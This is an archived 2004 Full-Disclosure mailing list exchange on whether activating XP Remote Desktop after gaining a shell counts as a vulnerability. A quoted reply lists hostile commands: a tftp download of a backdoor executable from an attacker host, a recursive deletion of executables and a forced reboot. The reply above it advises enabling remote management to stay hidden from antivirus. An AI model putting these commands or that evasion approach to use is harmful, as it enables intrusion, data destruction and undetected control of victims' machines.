lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: joel at helgeson.com (Joel R. Helgeson)
Subject: XP Remote Desktop Remote Activation

If someone installs a backdoor, that can be detected by AV scanner.  If you 
gain temporary shell, open up the management interface, you'll have full 
control of the box without anyone becoming the wiser.

Joel R. Helgeson
Director of Networking & Security Services
SymetriQ Corporation

"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll 
be warm for the rest of his life."
----- Original Message ----- 
From: "morning_wood" <se_cur_ity@...mail.com>
To: "Fixer" <fixer907@...il.com>; <full-disclosure@...ts.netsys.com>
Sent: Saturday, October 02, 2004 11:05 AM
Subject: Re: [Full-Disclosure] XP Remote Desktop Remote Activation


>> a malicious user who has already gained a command shell to activate
>
> umm... you already own the box.
> try...
> tftp -i yourhost get evilbackdoor.exe ( vnc mabey )
>
> or
>
> c:\del *.exe /s
> c:\shutdown -r
>
> I realy do not see the SECURITY ISSUE here.
>
>
> cheers,
> m.wood
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html 


Powered by blists - more mailing lists